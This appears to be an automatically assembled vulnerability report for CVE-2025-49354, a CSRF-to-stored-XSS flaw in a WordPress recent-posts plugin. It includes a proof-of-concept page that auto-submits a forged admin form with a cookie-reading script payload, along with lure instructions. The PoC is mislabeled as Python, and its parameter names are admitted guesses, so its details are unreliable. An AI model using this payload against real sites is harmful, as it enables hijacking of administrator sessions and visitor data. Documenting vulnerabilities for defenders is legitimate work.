Security Vulnerability Report
中文
CVE-2025-49354 CVSS 7.1 HIGH

CVE-2025-49354

Published: 2025-12-31 06:15:41
Last Modified: 2026-04-23 15:31:31

Description

Cross-Site Request Forgery (CSRF) vulnerability in Mindstien Technologies Recent Posts From Each Category recent-posts-from-each-category allows Stored XSS.This issue affects Recent Posts From Each Category: from n/a through <= 1.4.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Recent Posts From Each Category插件 <= 1.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2025-49354 --> <!-- Stored XSS via plugin settings --> <html> <body> <h2>CVE-2025-49354 CSRF PoC</h2> <p>诱骗管理员提交恶意配置以注入存储型XSS</p> <form action="http://target-wordpress-site/wp-admin/options-general.php?page=recent-posts-from-each-category" method="POST" id="exploit"> <!-- 插件设置参数,实际参数名需根据插件代码确定 --> <input type="hidden" name="rpfc_category" value="1"> <input type="hidden" name="rpfc_title" value='"><script>alert(document.cookie)</script><x y="'> <input type="hidden" name="rpfc_count" value="5"> <input type="hidden" name="submit" value="Save Changes"> </form> <script> // 自动提交表单 document.getElementById('exploit').submit(); </script> </body> </html> <!-- 攻击说明: 1. 将此HTML页面托管在攻击者服务器 2. 诱使WordPress管理员访问该页面 3. 由于管理员已登录,恶意请求会自动以管理员身份发送 4. 恶意JavaScript代码被存储到数据库 5. 任何访问插件输出页面的用户都会执行恶意脚本 -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-49354", "sourceIdentifier": "[email protected]", "published": "2025-12-31T06:15:41.223", "lastModified": "2026-04-23T15:31:31.293", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in Mindstien Technologies Recent Posts From Each Category recent-posts-from-each-category allows Stored XSS.This issue affects Recent Posts From Each Category: from n/a through <= 1.4."}, {"lang": "es", "value": "Vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en Mindstien Technologies Recent Posts From Each Category permite XSS almacenado. Este problema afecta a Recent Posts From Each Category: desde n/a hasta 1.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/recent-posts-from-each-category/vulnerability/wordpress-recent-posts-from-each-category-plugin-1-4-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}